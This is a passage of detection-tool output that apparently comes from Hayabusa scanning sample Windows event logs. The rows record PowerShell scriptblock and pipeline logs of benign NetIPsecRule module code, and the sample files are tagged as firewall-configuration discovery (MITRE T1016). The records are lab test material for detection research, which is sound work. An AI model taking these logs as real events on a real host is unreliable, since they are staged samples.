$__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_que",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
